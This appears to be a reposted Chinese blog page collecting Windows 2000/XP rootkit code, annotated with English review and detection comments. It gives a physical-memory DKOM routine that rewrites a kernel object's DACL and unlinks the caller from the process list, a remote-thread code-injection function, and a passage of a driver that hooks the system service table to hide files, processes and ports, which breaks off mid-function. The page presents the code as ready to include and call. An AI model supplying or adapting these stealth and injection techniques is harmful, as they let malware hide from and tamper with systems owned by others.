
[转载]在2000和xp下 隐藏进程 VC6.0测试通过

[转载]在2000和xp下 隐藏进程 VC6.0测试通过

信息来源:http://blog.csdn.net/uoyevoli/services/trackbacks/386210.aspx

头文件:

//////////////////////////////////////
//HideProcess.h
BOOL HideProcess();



CPP源文件:
/////////////////////////////////////////////////////////////////////////////
//HideProcess.cpp
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

#include"HideProcess.h"

#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

// Local copy of the native IO_STATUS_BLOCK layout (windows.h does not expose
// it). It is declared for completeness; nothing in this file reads or writes
// one.
typedef struct _IO_STATUS_BLOCK
{
   NTSTATUS Status;
   ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// Counted UTF-16 string as used by the native (Nt/Zw) API. OpenPhysicalMemory()
// fills one through the dynamically resolved RtlInitUnicodeString and hands it
// to ZwOpenSection inside an OBJECT_ATTRIBUTES.
typedef struct _UNICODE_STRING
{
   USHORT Length;
   USHORT MaximumLength;
   PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT           0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE   0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK        0x00000100L
#define OBJ_KERNEL_HANDLE      0x00000200L
#define OBJ_VALID_ATTRIBUTES   0x000003F2L

// Object descriptor passed to ZwOpenSection; OpenPhysicalMemory() sets every
// field explicitly (Length = sizeof, ObjectName = the device path, everything
// else NULL/0).
typedef struct _OBJECT_ATTRIBUTES
{
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;
   PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// Signatures of the two ntdll exports that InitNTDLL() resolves at runtime
// with GetProcAddress. CALLBACK expands to the stdcall convention, which is
// what these exports use on 32-bit Windows.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
   OUT PHANDLE SectionHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES ObjectAttributes
   );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
   IN OUT PUNICODE_STRING DestinationString,
   IN PCWSTR SourceString
   );

// File-wide state shared by the functions below. None of it is protected
// against concurrent use; the code assumes a single caller.
RTLINITUNICODESTRING RtlInitUnicodeString;   // resolved by InitNTDLL(), NULL until then
ZWOPENSECTION ZwOpenSection;                 // resolved by InitNTDLL(), NULL until then
HMODULE g_hNtDLL = NULL;                     // ntdll.dll handle from LoadLibrary
PVOID g_pMapPhysicalMemory = NULL;           // view of the page directory (see OpenPhysicalMemory)
HANDLE g_hMPM = NULL;                        // section handle for \Device\PhysicalMemory
OSVERSIONINFO g_osvi;                        // filled by OpenPhysicalMemory, read again by YHideProcess
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves the two exports this file calls through
// function pointers (RtlInitUnicodeString, ZwOpenSection).
// Returns FALSE only when LoadLibrary fails; CloseNTDLL() releases the module.
// NOTE(review): neither GetProcAddress result is checked, so a missing export
// would only show up later as a call through a NULL function pointer.
BOOL InitNTDLL()
{
   g_hNtDLL = LoadLibrary("ntdll.dll");

   if (NULL == g_hNtDLL)
      return FALSE;

   // The line break inside this call is how the snippet was posted.
   RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

"RtlInitUnicodeString");
   ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

   return TRUE;
}
//---------------------------------------------------------------------------
// Releases the ntdll.dll reference taken by InitNTDLL() and clears the global,
// so calling it twice is harmless. FreeLibrary only drops the module's
// reference count; the function has no return value and reports nothing.
VOID CloseNTDLL()
{
   HMODULE hMod = g_hNtDLL;
   g_hNtDLL = NULL;
   if (hMod != NULL)
   {
      FreeLibrary(hMod);
   }
}
//---------------------------------------------------------------------------
// Adds a SECTION_MAP_WRITE allow-ACE for the calling user to the DACL of the
// given section handle. OpenPhysicalMemory() calls this with a handle opened
// for READ_CONTROL|WRITE_DAC after the first ZwOpenSection was refused.
//
// Review notes:
//  - The function returns VOID, so the caller cannot tell whether the ACE was
//    added; it simply retries the open afterwards.
//  - None of the three error branches returns. After a failed GetSecurityInfo
//    the code still calls SetEntriesInAcl with whatever pDacl holds, and after
//    a failed SetEntriesInAcl it still calls SetSecurityInfo with a NULL
//    pNewDacl (which would install an empty DACL).
//  - On the success path pSD and pNewDacl are never freed.
//  - The misspelled name ("Physcial", "Writed") is part of the interface used
//    by OpenPhysicalMemory() and is left unchanged.
// Detection note: user-mode code changing the DACL of the PhysicalMemory
// section object is a strong indicator on its own; kernel-object auditing can
// record the SetSecurityInfo call.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
   PACL pDacl              = NULL;
   PSECURITY_DESCRIPTOR pSD   = NULL;
   PACL pNewDacl = NULL;

   // Fetch the existing DACL; pSD receives the descriptor that owns pDacl and
   // must be released with LocalFree.
   DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,

NULL, &pDacl, NULL, &pSD);

   if(ERROR_SUCCESS != dwRes)
   {
   // NOTE(review): frees but does not return; execution continues below.
   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }

   // One explicit ACE granting map-write access. "CURRENT_USER" is the special
   // trustee name SetEntriesInAcl resolves to the caller's account.
   EXPLICIT_ACCESS ea;
   RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
   ea.grfAccessPermissions = SECTION_MAP_WRITE;
   ea.grfAccessMode = GRANT_ACCESS;
   ea.grfInheritance= NO_INHERITANCE;
   ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
   ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
   ea.Trustee.ptstrName = "CURRENT_USER";

   // Merge the new ACE with the existing DACL into pNewDacl (LocalFree-owned).
   dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

   if(ERROR_SUCCESS != dwRes)
   {
   // NOTE(review): frees but does not return; SetSecurityInfo still runs.
   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }
   // Install the merged DACL on the section object.
   dwRes = SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);

   if(ERROR_SUCCESS != dwRes)
   {
   // NOTE(review): on success pSD/pNewDacl are never freed (leak).
   if(pSD)
      LocalFree(pSD);
   if(pNewDacl)
      LocalFree(pNewDacl);
   }

}
//---------------------------------------------------------------------------
// Opens the \Device\PhysicalMemory section for read/write and maps the 4 KiB
// page at a hard-coded physical address into g_pMapPhysicalMemory. That page
// is later indexed by LinearToPhys() as a page directory, so PhyDirectory is
// presumably the physical address of the kernel's page directory on the two
// OS builds the code knows (5.0 = Windows 2000, 5.1 = Windows XP); any other
// version makes the function return NULL.
//
// Returns the section handle (also stored in g_hMPM) or NULL on failure.
//
// Review notes:
//  - If the first open is refused, the handle is reopened with WRITE_DAC, the
//    DACL is rewritten (SetPhyscialMemorySectionCanBeWrited) and the open is
//    retried; the status of the WRITE_DAC open itself is never checked.
//  - On a MapViewOfFile failure the function returns NULL but leaves g_hMPM
//    open (no CloseHandle).
//  - The hard-coded directory addresses are only valid for the exact builds
//    the author tested; on any other build the subsequent reads and writes
//    through GetData()/SetData() touch arbitrary physical pages.
// Detection note: a user-mode open of \Device\PhysicalMemory with
// SECTION_MAP_WRITE is the key indicator here; later Windows versions refuse
// user-mode access to this section entirely.
HANDLE OpenPhysicalMemory()
{
   NTSTATUS status;
   UNICODE_STRING physmemString;
   OBJECT_ATTRIBUTES attributes;
   ULONG PhyDirectory;

   g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx (&g_osvi);

   // Only the NT 5.x family is handled.
   if (5 != g_osvi.dwMajorVersion)
      return NULL;

   switch(g_osvi.dwMinorVersion)
   {
      case 0:
        PhyDirectory = 0x30000;
        break; //2k
      case 1:
        PhyDirectory = 0x39000;
        break; //xp
      default:
        return NULL;
   }

   RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

   attributes.Length              = sizeof(OBJECT_ATTRIBUTES);
   attributes.RootDirectory        = NULL;
   attributes.ObjectName           = &physmemString;
   attributes.Attributes           = 0;
   attributes.SecurityDescriptor      = NULL;
   attributes.SecurityQualityOfService   = NULL;

   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

   // Access denied: grant ourselves map-write on the object and retry.
   if(status == STATUS_ACCESS_DENIED)
   {
      status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
      SetPhyscialMemorySectionCanBeWrited(g_hMPM);
      CloseHandle(g_hMPM);
      status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
   }

   if(!NT_SUCCESS(status))
      return NULL;

   // Map one page at physical offset PhyDirectory (the line break is as posted).
   g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

0x1000);

   if( g_pMapPhysicalMemory == NULL )
      return NULL;

   return g_hMPM;
}
//---------------------------------------------------------------------------
// Translates a kernel virtual address to a physical address by walking the
// page tables by hand. The shifts and masks (directory index = addr >> 22,
// table index = bits 21..12, 4-byte entries) correspond to classic 32-bit
// two-level paging; the walk would be wrong on a PAE kernel, which the code
// does not check for.
//
// BaseAddress: the mapped page directory (g_pMapPhysicalMemory).
// addr:        virtual address to translate.
// Returns the physical address, or 0 when the directory or table entry has
// its present bit clear. A genuine physical address 0 is indistinguishable
// from that failure value; the callers (GetData/SetData) do not check it.
//
// Review notes:
//  - The MapViewOfFile result for the page table is dereferenced without a
//    NULL check.
//  - The not-present-PTE return leaves the page-table view mapped (no
//    UnmapViewOfFile on that path).
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
   ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
   PGDE = BaseAddress[VAddr>>22];

   // Bit 0: present.
   if (0 == (PGDE&1))
      return 0;

   // Bit 7: page-size flag, i.e. the directory entry maps a 4 MiB page directly.
   ULONG tmp = PGDE & 0x00000080;

   if (0 != tmp)
   {
      PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
   }
   else
   {
      // Map the page table (access 4 == FILE_MAP_READ) and pick the PTE.
      PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
      PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

      // NOTE(review): returns without unmapping the view taken above.
      if (0 == (PTE&1))
        return 0;

      PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
      UnmapViewOfFile((PVOID)PGDE);
   }

   return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
// Reads one 32-bit value at a kernel virtual address through the physical
// memory section: translate with LinearToPhys(), map the containing 4 KiB
// page, index by the page offset (addr is assumed 4-byte aligned, hence >>2).
// Returns the value, or 0 if the page could not be mapped.
// NOTE(review): a 0 from LinearToPhys() (entry not present) is not detected
// here; the code then maps physical page 0 and returns whatever is there.
ULONG GetData(PVOID addr)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

0xfffff000, 0x1000);

   if (0 == tmp)
      return 0;

   ULONG ret = tmp[(phys & 0xFFF)>>2];
   UnmapViewOfFile(tmp);

   return ret;
}
//---------------------------------------------------------------------------
// Writes one 32-bit value at a kernel virtual address; the mirror of
// GetData(): translate, map the page for write, store at the page offset.
// Returns FALSE only when MapViewOfFile fails.
// NOTE(review): as in GetData(), a failed translation (phys == 0) is not
// detected, so the store would land in physical page 0. This is the primitive
// YHideProcess() uses to patch kernel structures from user mode.
BOOL SetData(PVOID addr,ULONG data)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

   if (0 == tmp)
      return FALSE;

   tmp[(phys & 0xFFF)>>2] = data;
   UnmapViewOfFile(tmp);

   return TRUE;
}
//---------------------------------------------------------------------------
// Unhandled-exception filter that terminates the process with exit code 0
// instead of letting the crash surface. The exception record is ignored.
// It is only referenced from a commented-out SetUnhandledExceptionFilter call
// in YHideProcess(). (Name misspelling kept: it is the symbol callers use.)
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
  (void)tmp;
  ExitProcess(0);
  // Unreachable: ExitProcess does not return. Value kept for the signature.
  return 1;
}
//---------------------------------------------------------------------------
// Unlinks the current process from the kernel's process list by writing to
// kernel memory through \Device\PhysicalMemory (user-mode DKOM).
//
// Steps, as the code shows them:
//   1. resolve ntdll exports and open/map physical memory;
//   2. read the current thread object pointer from 0xFFDFF124 (the page
//      labels it "kteb"), then the owning process from thread+0x44 ("kpeb");
//   3. read the forward/backward list pointers at an OS-specific offset in
//      that process object (0xa0/0xa4 on 5.0, 0x88/0x8c on 5.1) -- presumably
//      the ActiveProcessLinks LIST_ENTRY;
//   4. write next->Blink = prev and prev->Flink = next, which removes the
//      entry from the doubly linked list. The hidden entry's own pointers are
//      left untouched.
//
// Returns FALSE if InitNTDLL() or OpenPhysicalMemory() fails, TRUE otherwise;
// the SetData() results are not checked.
//
// Review notes:
//  - fw/bw are only assigned for minor version 0 or 1; other versions are
//    already rejected by OpenPhysicalMemory(), but the variables are still
//    formally uninitialized on that path.
//  - The early return after OpenPhysicalMemory() skips CloseNTDLL();
//    g_pMapPhysicalMemory is never unmapped on any path.
// Detection note: a process missing from the list walk but still visible to
// other enumeration sources (thread/handle tables, scheduler state) is the
// classic cross-view signal for this technique; the physical-memory section
// open and DACL change in OpenPhysicalMemory() are the user-mode precursors.
BOOL YHideProcess()
{
//   SetUnhandledExceptionFilter(exeception);

   if (FALSE == InitNTDLL())
      return FALSE;

   if (0 == OpenPhysicalMemory())
      return FALSE;

   ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
   ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

   // Forward and backward links of the process-list entry (offsets differ
   // between Windows 2000 and XP).
   ULONG fw, bw;
   if (0 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0xa0));
      bw = GetData(PVOID(process + 0xa4));
   }

   if (1 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0x88));
      bw = GetData(PVOID(process + 0x8c));
   }

   // Splice the neighbours together: next.Blink = prev, prev.Flink = next.
   SetData(PVOID(fw + 4), bw);
   SetData(PVOID(bw), fw);

   CloseHandle(g_hMPM);
   CloseNTDLL();

   return TRUE;
}

// Public entry point declared in HideProcess.h. Runs YHideProcess() at most
// once per process (guarded by a function-static flag) and always returns
// true; the result of YHideProcess() is not propagated.
BOOL HideProcess()
{
   static BOOL b_hide = false;
   if (b_hide)
      return true;
   b_hide = true;
   YHideProcess();
   return true;
}


然后在需要隐藏进程的时候#include"HideProcess.h",调用HideProcess()即可。
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。


看我远程注入~~~hoho~~~
/
// @Name:   ThreadInject
// @Author: luoluo
// @Time:   2005-04-17
// @Param:  pId - process id of the target process
// @Ret:    TRUE on success, FALSE on failure
//
// Copies the bytes of ThreadProc into the target process and starts them as a
// remote thread with a copied RemotePara block as its argument. RemotePara,
// PRemotePara, CreateParameter(), ThreadProc and THREADSIZE are not shown on
// this page; the code assumes ThreadProc is a contiguous, position-independent
// function of at most THREADSIZE bytes.
//
// Review notes:
//  - hProcess and hToken are never initialized, but FreeAndExit tests and
//    closes them; any goto before OpenProcessToken/OpenProcess succeeds reads
//    an indeterminate handle value.
//  - AdjustTokenPrivileges is passed sizeof(&tkp), the size of a pointer,
//    rather than the size of the TOKEN_PRIVILEGES structure.
//  - The VirtualProtectEx calls reuse mbi.Protect as the "old protection"
//    output and then restore from it; it works but is easy to misread.
//  - lpCodeMemory is not released on the VirtualQueryEx/VirtualProtectEx
//    failure paths, and hThread is never closed.
// Detection note: the sequence SeDebugPrivilege -> OpenProcess with
// PROCESS_VM_WRITE|PROCESS_CREATE_THREAD -> VirtualAllocEx(PAGE_EXECUTE_READWRITE)
// -> WriteProcessMemory -> CreateRemoteThread is the textbook injection chain
// that endpoint telemetry keys on.
BOOL WINAPI ThreadInject(DWORD pId)
{
    HANDLE                        hProcess;
    LPVOID                        lpCodeMemory;
    BOOL                        bRet = FALSE;
    BOOL                        bRetVal;
    RemotePara                    myRemotePara;
    PRemotePara                    pRemotePara;
    HANDLE                        hThread;
    DWORD                        dwByteWrite;
    HANDLE                        hToken;
    TOKEN_PRIVILEGES            tkp;
    MEMORY_BASIC_INFORMATION    mbi;
    SIZE_T                        szRet;
    DWORD                        dwOldProtect;

    // Open our own token so SeDebugPrivilege can be enabled.
    bRetVal = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);

    if (! bRetVal)
    {
        //MessageBox(NULL, "failed OpenProcessToken", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Get the LUID for debug privilege
    bRetVal = LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid);

    if (! bRetVal)
    {
        //MessageBox(NULL, "failed LookupPrivilegeValue", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Adjust token privileges
    // NOTE(review): sizeof(&tkp) is the size of a pointer, not of tkp.
    bRetVal = AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(&tkp), (PTOKEN_PRIVILEGES)NULL, 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed AdjustTokenPrivileges", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Open remote process
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pId);
    if (hProcess == NULL)
    {
        //MessageBox(NULL, "failed OpenProcess", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Allocate an executable region in the target for the thread body.
    lpCodeMemory = VirtualAllocEx(hProcess, NULL, THREADSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (lpCodeMemory == NULL)
    {
        //MessageBox(NULL, "failed VirtualAllocEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Query the page information
    ZeroMemory(&mbi, sizeof(MEMORY_BASIC_INFORMATION));
    szRet = VirtualQueryEx(hProcess, lpCodeMemory, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
    if (szRet == 0)
    {
        //MessageBox(NULL, "failed VirtualQueryEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Make the region writable; the previous protection is stored in mbi.Protect.
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_EXECUTE_READWRITE, &mbi.Protect);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed VirtualProtectEx", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Copy THREADSIZE bytes starting at ThreadProc into the target.
    bRetVal = WriteProcessMemory(hProcess, lpCodeMemory, &ThreadProc, THREADSIZE, 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed WriteProcessMemory", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        goto FreeAndExit;
    }

    // Restore the protection saved in mbi.Protect.
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed VirtualProtectEx 2", "Error", MB_ICONERROR);
        goto FreeAndExit;
    }

    // Fill in the parameter block (CreateParameter is not shown on this page).
    ZeroMemory(&myRemotePara, sizeof(RemotePara));
    CreateParameter((PRemotePara)&myRemotePara);

    // Allocate memory in the remote process to store the parameter
    pRemotePara = (PRemotePara)VirtualAllocEx(hProcess, NULL, sizeof(RemotePara), MEM_COMMIT, PAGE_READWRITE);
    if (pRemotePara == NULL)
    {
        //MessageBox(NULL, "failed VirtualAllocEx", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        goto FreeAndExit;
    }

    // Query page information
    // NOTE(review): lpCodeMemory is leaked on the next two failure paths.
    ZeroMemory(&mbi, sizeof(MEMORY_BASIC_INFORMATION));
    szRet = VirtualQueryEx(hProcess, pRemotePara, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
    if (szRet == 0)
        goto FreeAndExit;

    // Modify page protection for write
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
    if (! bRetVal)
        goto FreeAndExit;

    // Write the parameter block into the remote process's memory
    bRetVal = WriteProcessMemory(hProcess, pRemotePara, &myRemotePara, sizeof(myRemotePara), 0);
    if (! bRetVal)
    {
        //MessageBox(NULL, "failed WriteProcessMemory", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        VirtualFreeEx(hProcess, pRemotePara, sizeof(RemotePara), MEM_RELEASE);
        goto FreeAndExit;
    }

    // Modify page protection to protect
    bRetVal = VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
    if (! bRetVal)
        goto FreeAndExit;

    // Start the copied code as a thread with pRemotePara as its argument.
    // dwByteWrite receives the thread id here, not a byte count.
    hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeMemory, pRemotePara, 0, &dwByteWrite);
    if (hThread == NULL)
    {
        //MessageBox(NULL, "failed CreateRemoteThread", "Error", MB_ICONERROR);
        VirtualFreeEx(hProcess, lpCodeMemory, THREADSIZE, MEM_RELEASE);
        VirtualFreeEx(hProcess, pRemotePara, sizeof(RemotePara), MEM_RELEASE);
        goto FreeAndExit;
    }

    // NOTE(review): hThread is never closed.
    bRet = TRUE;

FreeAndExit:
    // NOTE(review): both handles may be uninitialized when reached by an early goto.
    if (hProcess != NULL)    CloseHandle(hProcess);
    if (hToken != NULL) CloseHandle(hToken);

    return bRet;
}


DRIVE 中隐藏任意进程,目录/文件,注册表,端口
Author: sinister
Email: sinister@whitecell.org
Homepage: http://www.whitecell.org
Date: 2002-05-08

查找进程,目录/文件,注册表等操作系统将最终调用 ZwQueryDirectoryFile,ZwQuerySystemInformation,
ZwXXXvalueKey 等函数。要想拦截这些函数达到隐藏目的,需先自己实现以上函数,并修改系统维护的一个
SYSCALL 表使之指向自己预先定义的函数。因 SYSCALL 表在用户层不可见,所以要写 DRIVE 在 RING 0 下
才可修改。关于如何修改已有文章详细介绍过,这里不再详述。(可以参见 sysinternals.com 或 WebCrazy 所
写的文章)。查找端口用的是 TDI 查询。TDI 导出了两个设备 \\Device\\Tcp 与 \\Device\\Udp。我们可以利
用设备过滤驱动的方法写一个 DRIVE 把这两个设备的所有 IRP 包接管过来进行处理后再传给下层驱动。以达到
隐藏任意端口的目的。上述提到的方法不是新东西,是在N年前就已经有的老技术。俺现在将它贴出来只不过为了
充实下版面,灌灌水罢了。高手们还是别看了。下面是我 DRIVE 中隐藏任意进程,目录/文件,端口代码片段。
(注册表操作在 RegMon 中写的很详细,这里就不列出了)




// 64-bit timestamp split into two DWORDs; redeclared here because the Win32
// header that normally defines FILETIME is not available in driver code.
typedef struct _FILETIME
{
DWORD dwLowDateTime;
DWORD dwHighDateTime;
} FILETIME;



// The author's view of one record in the buffer returned by
// ZwQueryDirectoryFile. Only dwLenToNext (byte offset to the next record,
// 0 for the last one) and suName (the entry name) are used by the hook.
// NOTE(review): with the 12-WCHAR short name this resembles
// FILE_BOTH_DIR_INFORMATION, but the hook never checks FileInfoClass, so the
// layout is applied to whatever class the caller asked for -- confirm.
// suName is a counted name (wNameLen), not necessarily NUL-terminated.
typedef struct _DirEntry
{
DWORD dwLenToNext;
DWORD dwAttr;
FILETIME ftCreate, ftLastAccess, ftLastWrite;
DWORD dwUnknown[ 2 ];
DWORD dwFileSizeLow;
DWORD dwFileSizeHigh;
DWORD dwUnknown2[ 3 ];
WORD wNameLen;
WORD wUnknown;
DWORD dwUnknown3;
WORD wShortNameLen;
WCHAR swShortName[ 12 ];
WCHAR suName[ 1 ];
} DirEntry, *PDirEntry;



// Per-thread record that follows each _SYSTEM_PROCESSES record in the
// SystemProcessInformation buffer. Declared for the array member below; the
// hook never reads its fields.
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};



// One record of the SystemProcessInformation (class 5) result as used by
// HookZwQuerySystemInformation(): NextEntryDelta is the byte offset to the
// next record (0 terminates the list) and ProcessName the image name. The
// remaining fields are carried for layout only. Layout is build-specific;
// the page gives no indication which OS versions it was checked against.
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};




// 隐藏目录/文件



// Replacement for ZwQueryDirectoryFile installed in the system service table.
// It forwards to the original (OldZwQueryDirectoryFile, not shown here) and
// then removes from the returned buffer every entry whose upper-cased name
// starts with a PTR_HIDEDIR name from list_head (also not shown).
//
// Returns the original status, or 0x80000006 (STATUS_NO_MORE_FILES) when the
// only entry in the buffer was hidden.
//
// Review notes:
//  - Two ANSI strings are allocated per entry (RtlUnicodeStringToAnsiString
//    with allocate=TRUE) but freed only once after the loop: a pool leak of
//    one pair per additional entry.
//  - RtlInitUnicodeString scans suName for a terminator, while the name is
//    counted (wNameLen); the scan can run past the entry.
//  - RtlCompareMemory is given strlen(ptr->name) bytes without checking that
//    ansiFileName is at least that long.
//  - The in-place removal copies (FileInformationBufferLength - iPos -
//    dwLenToNext) bytes with RtlCopyMemory over overlapping ranges; memcpy
//    semantics do not guarantee the result for overlapping buffers, and the
//    copy length covers the whole rest of the buffer, not just valid data.
//  - aProcessName, ParentDirectory, BytesReturned and Object are unused.
// Detection note: a service-table entry for NtQueryDirectoryFile pointing
// outside ntoskrnl is the direct indicator; a cross-view comparison of a
// directory listing against the raw file system reveals the hidden entries.
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS rc;
CHAR aProcessName[80];
ANSI_STRING ansiFileName,ansiDirName;
UNICODE_STRING uniFileName;
PP_DIR ptr;



WCHAR ParentDirectory[1024] = {0};
int BytesReturned;
PVOID Object;




// Call the original ZwQueryDirectoryFile first.
rc = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);

if(NT_SUCCESS(rc))
{
PDirEntry p;
PDirEntry pLast;
BOOL bLastOne;
int found;
p = (PDirEntry)FileInformationBuffer; // view the result buffer as DirEntry records
pLast = NULL;

do
{
bLastOne = !( p->dwLenToNext );
// Build an upper-cased ANSI copy of the entry name (both allocated).
RtlInitUnicodeString(&uniFileName,p->suName);
RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
RtlUpperString(&ansiFileName,&ansiDirName);



found=0;

// Prefix match against the hide list (PTR_HIDEDIR entries only).
for(ptr = list_head; ptr != NULL; ptr = ptr->next)
{
if (ptr->flag != PTR_HIDEDIR) continue;
if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name))
{
found=1;
break;
}
}//end for



// Entry is on the list: drop it from the buffer.
if(found)
{
if(bLastOne)
{
if(p == (PDirEntry)FileInformationBuffer )
{
rc = 0x80000006; // STATUS_NO_MORE_FILES: the only entry was hidden
}
else
pLast->dwLenToNext = 0;
break;
}
else
{
